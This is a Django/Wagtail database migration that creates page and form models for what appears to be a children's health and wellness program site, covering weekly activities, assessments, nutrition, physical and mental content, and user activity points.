class Migration(migrations.Migration):
initial = True
dependencies = [
('wagtailimages', '0001_squashed_0021'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('wagtailcore', '0041_group_collection_permissions_verbose_name_plural'),
('account', '0001_initial'),
]
operations = [
        migrations.CreateModel(
            name='AnnouncementAlertPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('announcements', wagtail.core.fields.RichTextField(blank=True)),
                ('display_warning', models.BooleanField(default=False, help_text='Check this box to display warning announcement on the website')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='Disclaimerlink',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('disclaimer', wagtail.core.fields.RichTextField(blank=True)),
                ('disclaimer2', models.CharField(blank=True, max_length=10000)),
                ('disclaimer3', models.CharField(blank=True, max_length=10000)),
                ('disclaimer4', models.CharField(blank=True, max_length=10000)),
                ('disclaimer5', models.CharField(blank=True, max_length=10000)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='DisclaimerPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('disclaimer', wagtail.core.fields.RichTextField(blank=True)),
                ('disclaimer2', models.CharField(blank=True, max_length=10000)),
                ('disclaimer3', models.CharField(blank=True, max_length=10000)),
                ('disclaimer4', models.CharField(blank=True, max_length=10000)),
                ('disclaimer5', models.CharField(blank=True, max_length=10000)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='EmailTemplates',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('subject_for_inactivity', models.CharField(blank=True, max_length=10000)),
                ('subject_for_group', models.CharField(blank=True, max_length=10000)),
                ('group_message', wagtail.core.fields.RichTextField(blank=True)),
                ('inactivity_message', wagtail.core.fields.RichTextField(blank=True)),
                ('subject_for_rewards_notification', models.CharField(blank=True, max_length=10000)),
                ('rewards_message', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='ExtrasIndexPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('description', wagtail.core.fields.RichTextField(blank=True)),
                ('additional', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='KindnessCardPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('KindnessCard', models.CharField(blank=True, max_length=10000)),
                ('KindnessCard2', models.CharField(blank=True, max_length=10000)),
                ('KindnessCard3', models.CharField(blank=True, max_length=10000)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='PreassessmentPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('thank_you_text', wagtail.core.fields.RichTextField(blank=True)),
                ('points_for_this_activity', models.IntegerField(blank=True, default=0)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='Print',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='PrivacyPolicyLink',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('policy', wagtail.core.fields.RichTextField(blank=True)),
                ('policy2', models.CharField(blank=True, max_length=10000)),
                ('attach_file', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='ProgramIndexPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('description', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='QuestionPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('thank_you_text', wagtail.core.fields.RichTextField(blank=True)),
                ('points_for_this_activity', models.IntegerField(blank=True, default=0)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='QuestionPageText',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('description', wagtail.core.fields.RichTextField(blank=True)),
                ('thank_you_text', wagtail.core.fields.RichTextField(blank=True)),
                ('points_for_this_activity', models.IntegerField(blank=True, default=0)),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='RewardsIndexPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('description', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='SidebarContentPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('subject_for_announcement1', models.CharField(blank=True, max_length=10000)),
                ('message_announcement1', wagtail.core.fields.RichTextField(blank=True)),
                ('subject_for_announcement2', models.CharField(blank=True, max_length=10000)),
                ('message_announcement2', wagtail.core.fields.RichTextField(blank=True)),
                ('subject_for_announcement3', models.CharField(blank=True, max_length=10000)),
                ('message_announcement3', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='SidebarImagePage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('subject_for_advertisement', models.CharField(blank=True, max_length=10000)),
                ('advertisement_image', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='StatementsPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('mission', models.CharField(blank=True, max_length=200)),
                ('vision', models.CharField(blank=True, max_length=200)),
                ('values', models.CharField(blank=True, max_length=200)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='WeekPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('description', wagtail.core.fields.RichTextField(blank=True)),
                ('start_date', models.DateTimeField(blank=True, null=True, verbose_name='Start Date')),
                ('end_date', models.DateTimeField(blank=True, null=True, verbose_name='End Date')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='welcomepage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('text1', wagtail.core.fields.RichTextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='UserActivity',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('Activity', models.CharField(max_length=50)),
                ('Week', models.IntegerField(null=True)),
                ('DayOfWeek', models.CharField(max_length=10)),
                ('points_earned', models.IntegerField(null=True)),
                ('creation_date', models.DateField()),
                ('updated_date', models.DateField()),
                ('program', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='account.Program')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Sensitive',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('description', wagtail.core.fields.RichTextField(blank=True)),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
                ('age_group_content', models.IntegerField(blank=True, default=0, verbose_name='Enter the age group to show the content to: 1 for 6 or younger; 2 for ages 7-10; 3 for ages 11-13; 4 for ages 14-16; 5 for 17+')),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='QuestionTextFormField',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
                ('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('multiselect', 'Multiple select'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time'), ('hidden', 'Hidden field')], max_length=16, verbose_name='field type')),
                ('required', models.BooleanField(default=True, verbose_name='required')),
                ('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
                ('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
                ('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_field', to='week.QuestionPageText')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='QuestionFormField',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
                ('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('multiselect', 'Multiple select'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time'), ('hidden', 'Hidden field')], max_length=16, verbose_name='field type')),
                ('required', models.BooleanField(default=True, verbose_name='required')),
                ('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
                ('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
                ('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='week.QuestionPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='PreassessmentFormField',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
                ('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('multiselect', 'Multiple select'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time'), ('hidden', 'Hidden field')], max_length=16, verbose_name='field type')),
                ('required', models.BooleanField(default=True, verbose_name='required')),
                ('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
                ('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
                ('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='week.PreassessmentPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='PostassessmentPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('thank_you_text', wagtail.core.fields.RichTextField(blank=True)),
                ('points_for_this_activity', models.IntegerField(blank=True, default=0)),
                ('start_date', models.DateTimeField(blank=True, null=True, verbose_name='Start Date')),
                ('end_date', models.DateTimeField(blank=True, null=True, verbose_name='End Date')),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='PostassessmentFormField',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
                ('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('multiselect', 'Multiple select'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time'), ('hidden', 'Hidden field')], max_length=16, verbose_name='field type')),
                ('required', models.BooleanField(default=True, verbose_name='required')),
                ('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
                ('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
                ('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='week.PostassessmentPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='PhysicalPostPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('strength', wagtail.core.fields.RichTextField(blank=True)),
                ('agility', wagtail.core.fields.RichTextField(blank=True)),
                ('flexibility', wagtail.core.fields.RichTextField(blank=True)),
                ('points_for_this_activity', models.IntegerField(blank=True, default=0)),
                ('timer_for_this_activity', models.CharField(blank=True, default=datetime.time(0, 11), help_text='Time format should be in MM:SS', max_length=20)),
                ('thank_you_text', wagtail.core.fields.RichTextField(blank=True)),
                ('start_date', models.DateTimeField(blank=True, null=True, verbose_name='Start Date')),
                ('end_date', models.DateTimeField(blank=True, null=True, verbose_name='End Date')),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='PhysicalFormField',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
                ('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('multiselect', 'Multiple select'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time'), ('hidden', 'Hidden field')], max_length=16, verbose_name='field type')),
                ('required', models.BooleanField(default=True, verbose_name='required')),
                ('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
                ('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
                ('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='week.PhysicalPostPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='NutritionPostPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
                ('morecontent', wagtail.core.fields.RichTextField(blank=True)),
                ('facts', wagtail.core.fields.RichTextField(blank=True)),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='NutritionGame',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='ModelIndexPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('description', wagtail.core.fields.RichTextField(blank=True)),
                ('intro', models.CharField(blank=True, max_length=255)),
                ('ad_url', models.URLField(blank=True)),
                ('vertical_url', models.URLField(blank=True)),
                ('announcements', wagtail.core.fields.RichTextField(blank=True)),
                ('ad_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
                ('vertical_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='MentalPostPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='MentalArtPostPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='LandingIndexPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('description', wagtail.core.fields.RichTextField(blank=True)),
                ('additional', wagtail.core.fields.RichTextField(blank=True)),
                ('physical', wagtail.core.fields.RichTextField(blank=True)),
                ('nutritional', wagtail.core.fields.RichTextField(blank=True)),
                ('mental', wagtail.core.fields.RichTextField(blank=True)),
                ('relational', wagtail.core.fields.RichTextField(blank=True)),
                ('physicaldesc', wagtail.core.fields.RichTextField(blank=True)),
                ('nutritionaldesc', wagtail.core.fields.RichTextField(blank=True)),
                ('mentaldesc', wagtail.core.fields.RichTextField(blank=True)),
                ('relationaldesc', wagtail.core.fields.RichTextField(blank=True)),
                ('card_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
                ('card_imageb', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
                ('card_imagec', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
                ('card_imaged', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='FunStuffGames',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('callout_intro', wagtail.core.fields.RichTextField(blank=True)),
                ('callout_message', wagtail.core.fields.RichTextField(blank=True)),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='FunStuffArt',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('callout_intro', wagtail.core.fields.RichTextField(blank=True)),
                ('callout_message', wagtail.core.fields.RichTextField(blank=True)),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='Fact',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('description', wagtail.core.fields.RichTextField(blank=True)),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='BonusQuestionPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('thank_you_text', wagtail.core.fields.RichTextField(blank=True)),
                ('points_for_this_activity', models.IntegerField(blank=True, default=0)),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='BonusQuestionFormField',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
                ('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('multiselect', 'Multiple select'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time'), ('hidden', 'Hidden field')], max_length=16, verbose_name='field type')),
                ('required', models.BooleanField(default=True, verbose_name='required')),
                ('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
                ('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
                ('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='week.BonusQuestionPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='addstudentoftheweek',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('student_name', models.CharField(blank=True, max_length=200)),
                ('my_favorite_color', models.CharField(blank=True, max_length=200)),
                ('my_favorite_healthy_snack', models.CharField(blank=True, max_length=200)),
                ('my_favorite_sport', models.CharField(blank=True, max_length=200)),
                ('my_favorite_athlete', models.CharField(blank=True, max_length=200)),
                ('my_friends_would_describe_me_as', models.CharField(blank=True, max_length=300)),
                ('am_good_at', models.CharField(blank=True, max_length=300)),
                ('display_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='AboutUsIndexPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('intro', wagtail.core.fields.RichTextField(blank=True)),
                ('description', wagtail.core.fields.RichTextField(blank=True)),
                ('ad_url', models.URLField(blank=True)),
                ('ad_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        migrations.CreateModel(
            name='CustomFormSubmission',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('form_data', models.TextField()),
                ('submit_time', models.DateTimeField(auto_now_add=True, verbose_name='submit time')),
                ('page', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='wagtailcore.Page')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='question_form', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'unique_together': {('page', 'user')},
            },
        ),
    ]
